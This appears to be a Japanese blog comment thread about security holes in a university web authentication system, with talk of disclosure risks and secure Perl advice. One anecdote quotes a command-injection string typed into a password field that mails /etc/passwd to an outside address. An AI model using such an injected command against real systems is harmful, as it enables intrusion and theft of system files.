じゅうぶんに、ゆすり・たかりの材料ですね(w
っていうか、どうせなら提案書書いて仕事にしなきゃね
ま、全て事が方付いたら、どういう感じになっていたか、どこかでの宴会ネタにはしますよ。(キット・・・
特に濃い所のネタにはちょうど良い
うはっ。 がんばれ〜 しかし、最近、この手の出来事多くないですか・・・(汗
セキュリティコミュニティ的には、善意の第3者としての、セキュリティホールの指摘はしない方向に向かってますねぇ…
不正アクセス禁止法違反になったらこわいしー。裁判いやだしー。
そうですよね〜。
でも、この場合私は、「被害者」ですからね
プログラムでいったらまさに「NG」じゃん、それ。(←デバッグ…って言い方になるのー?)
その点、うちの大学は大丈夫のようで。学外から大学のweb見れるけど見れないとこあるし。けど、見れる内容って少ないわ。
お疲れさま〜。とりあえず直ったようで何よりです。本格改修のときに、また穴が開かないといいですが。(わら)
結局、KUDOSの方で、3人の方と、いろいろとお話してきましたにょ。
既存の問題点も含め、気になったことの大半を話してきました。
あとで、どんな感じになったか、かける範囲でかくにょ。
にひひ。
今は昔、Web認証システムがありました。
男>パスワード欄に;mail foo@bar </etc/passwd; って入力すると_まんま実行される_のですが…!
サポ>パスワード欄に英数字以外を入力することは仕様に反します。サポート対象外です。
男> あほー! (-_-#) そういう問題かよ!
男はサポと話をしているのか詭弁家と話をしているのか判らなくなりました。
めでたくない昔話でした。
雰囲気的には、デバッグ環境が放置され、問題になったのではないかなと推測しましたが、真偽は今のところ分かっていません。何にしろ、システム構築をした外注業者はあまりにも安易な所に認証も無しに放置してしまったと言うところに問題点が置かれそうです。
関係者は、レポートとか報告書とか仕上げるために、徹夜で作業しているんだろうか…。影響範囲も夕方の時点では判明していなかった模様。とにかくガンバッテクダサイ(他人事のように言ってるけど…)
1998年の暮れには、理工学部3,000人のID、パスワードを録られているしね。
おつかれさまでした。
ircで聞いて心配してたんですが、
それなりに落ち着いてよかったですね。
結果れぽ楽しみにしときます。
きっと、これ以上の結果レポは無いかも。
これ以上書くのも不味すぎる予感。
ううむぅ。まだ、穴があるのですが…。どうしましょ(−−;
あれから数個発見。マスタデータにも…(死
今頃目が覚めた。
セキュアプログラミングの神から啓示があった。
http://www.ipa.go.jp/security/awareness/vendor/programming/a04.html を詠め。
Perl は -wT で実行しろ。
use strict もやっておけ。
exec()するところは全て注意しろ。
汝この教えを広めよ。
神様、解りましたからもう眠らせてください。
※ ブラウザキャッシュを持っていることが多く,投稿後なかなか日記には反映されませんので,強制リロードしてみてください
※ IEであれば"Clrl+F5"で強制リロードが行えます
※ 特定のリモートホストからの投稿は、認証画面が出ますので、ID及びパスワードに 'test' と入力してください。